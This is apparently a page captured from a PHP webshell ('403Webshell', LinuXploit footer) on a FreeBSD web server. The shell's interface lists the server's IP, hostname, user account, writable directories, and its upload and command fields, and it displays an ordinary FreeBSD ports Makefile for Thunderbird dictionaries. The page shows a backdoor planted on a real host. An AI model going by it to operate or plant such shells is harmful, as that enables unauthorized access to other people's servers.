403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/thunderbird-dictionaries/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/thunderbird-dictionaries/Makefile
PORTNAME=	thunderbird-dictionaries
PORTVERSION=	20060220
PORTREVISION=	13
CATEGORIES=	mail
MASTER_SITES=	MOZDEV/dictionaries
DISTFILES=	# filled in later after options
DIST_SUBDIR=	thunderbird

MAINTAINER=	mjl@luckie.org.nz
COMMENT=	Dictionaries for Mozilla Thunderbird
WWW=		http://www.mozilla.com/thunderbird/dictionaries.html

RUN_DEPENDS=	thunderbird>=6.0:mail/thunderbird

USES=		zip:infozip
NO_BUILD=	yes
WRKSRC=		${WRKDIR}/dictionaries

# All available dictionaries are listed in Makefile.dict
# Makefile.dict pulls in Makefile.options
.include "${.CURDIR}/Makefile.dict"

.include <bsd.port.options.mk>

# this dictionary requires special handling in do-install
BG_DICT=	BG

# Figure out which distfiles to use, and how to construct the plist
.for f in ${ALLDICTS}
.if ${PORT_OPTIONS:M${f}}
DISTFILES+=	${${f}_FILE}
.endif
.endfor

# Extract the relevant distfiles
do-extract:
	@${MKDIR} ${WRKSRC}
.for f in ${ALLDICTS}
.if  ${PORT_OPTIONS:M${f}}
	@${UNZIP_CMD} -q ${DISTDIR}/${DIST_SUBDIR}/${${f}_FILE} -d ${WRKSRC}/${${f}_FILE}
.endif
.endfor

# Install the requested dictionaries
do-install:
	@${MKDIR} ${STAGEDIR}${PREFIX}/lib/thunderbird/dictionaries
.for f in ${ALLDICTS}
.if ${PORT_OPTIONS:M${f}}
.if ${BG_DICT}==${f}
	${INSTALL_DATA} \
		${WRKSRC}/${${f}_FILE}/bin/components/myspell/${${f}_FILE:S/spell-//:S/xpi//}aff \
		${STAGEDIR}${PREFIX}/lib/thunderbird/dictionaries
	${INSTALL_DATA} \
		${WRKSRC}/${${f}_FILE}/bin/components/myspell/${${f}_FILE:S/spell-//:S/xpi//}dic \
		${STAGEDIR}${PREFIX}/lib/thunderbird/dictionaries
.else
	${INSTALL_DATA} \
		${WRKSRC}/${${f}_FILE}/${${f}_FILE:S/spell-//:S/xpi//}aff \
		${STAGEDIR}${PREFIX}/lib/thunderbird/dictionaries
	${INSTALL_DATA} \
		${WRKSRC}/${${f}_FILE}/${${f}_FILE:S/spell-//:S/xpi//}dic \
		${STAGEDIR}${PREFIX}/lib/thunderbird/dictionaries
.endif
.endif
.endfor

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit